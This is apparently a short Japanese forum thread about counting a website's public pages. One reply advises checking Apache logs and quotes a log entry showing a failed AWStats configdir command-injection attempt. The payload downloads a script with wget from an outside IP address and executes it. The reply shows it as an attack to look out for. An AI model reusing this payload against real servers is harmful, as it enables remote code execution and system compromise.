http://www.geocities.jp/horiuchimasaru/wget.html
Wget$B$r;H$*$&E*%Z!<%8(B
自動巡回ソフトなどでも、同様のことが出来ます。
ページ数のみなら更に簡単だと思います。
心配でしたら、httpdのログを見直されてはどうでしょうか。
less /var/log/httpd/access_log.1 | grep wget
XXX.XXX.XXX.XXX - - [28/Jan/2006:21:36:06 +0900] ”GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1” 404 299 ”-” ”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”
上の例は、どうやらアタックのようですが通っていないです。
もしCGIを置かれているならば、アタックと同じplファイルなどが見つかります。
#updatedb &
#locate awstats.pl
#
と言った手順で、例のようなファイルがあれば検出されるはずです。
サイト内にある、ネットに公開されているページ数は、このようにGoogleを利用するなどして取得できると思いますが、こういった状況とは異なるのでしょうか?
巡回ロボットが拾ってないHTMLは これで検出できないのでは?
なるほど 参考にします